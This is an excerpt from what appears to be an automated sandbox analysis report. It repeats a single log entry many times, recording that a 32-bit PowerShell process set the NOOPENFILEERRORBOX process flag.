            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
